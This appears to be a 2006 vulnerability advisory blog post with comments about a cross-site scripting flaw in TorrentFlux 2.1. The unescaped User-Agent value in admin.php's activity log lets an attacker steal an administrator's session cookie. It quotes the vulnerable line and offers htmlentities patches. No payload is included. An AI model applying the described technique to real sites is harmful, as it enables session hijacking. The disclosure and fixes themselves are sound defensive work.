TorrentFlux User-Agent XSS Vulnerability
Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)
I gave the authors of this product a week (more than usual) just to contact me, they have failed to do so; so I am releasing this vulnerability publicly!
/admin.php
Line: 325
$ip_info = $ip_resolved.”
“.$user_agent;
Useragent is not esacped.
Solution:
Edit source code:
/admin.php
Line: 325:
$ip_info = htmlentities($ip_resolved, ENT_QUOTES).”
“.htmlentities($user_agent, ENT_QUOTES);
Luis said,
October 10, 2006 @ 2:35 pm
Thanks, I do not understand the vulnerability but I adopted your solution.
Steven Roddis said,
October 10, 2006 @ 4:13 pm
In a nutshell, if an attacker spoofs his user-agent (extreamly easy) and you visit your activity logs, he/she can “steal” your session cookie and login as you… What he/she does then is up to them!
Chrome said,
October 17, 2006 @ 3:58 am
The real fix for this is to edit the following in the settingsfunctions.php:
Line 33:
[code] return htmlentities(trim($_REQUEST[$varName]), ENT_QUOTES);[/code]
Lines 51-59:
[code] $rec = array(
‘user_id’ => $cfg['user'],
‘file’ => $file,
‘action’ => $action,
‘ip’ => htmlentities($cfg['ip'], ENT_QUOTES),
‘ip_resolved’ => htmlentities($host_resolved, ENT_QUOTES),
‘user_agent’ => htmlentities($_SERVER['HTTP_USER_AGENT'], ENT_QUOTES),
‘time’ => $create_time
);[/code]
By doing this, all the request/get vars will be scrubbed as well as any logging of user-agents and IP addresses reported by the visitor.
We are planning a TF 2.1.1 release very soon.